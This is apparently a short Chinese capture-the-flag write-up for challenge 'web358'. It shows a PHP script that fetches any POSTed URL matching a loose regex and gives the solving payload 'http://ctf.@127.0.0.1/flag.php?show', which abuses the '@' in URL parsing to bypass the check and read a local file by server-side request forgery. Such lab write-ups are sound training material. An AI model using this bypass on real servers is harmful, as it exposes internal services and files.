web358

代码审计

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url))
//正则匹配http://ctf.开头show结尾的url
{
 echo file_get_contents($url);
}

所以要利用 URL 解析问题进行构造url

#POST提交
url=http://ctf.@127.0.0.1/flag.php?show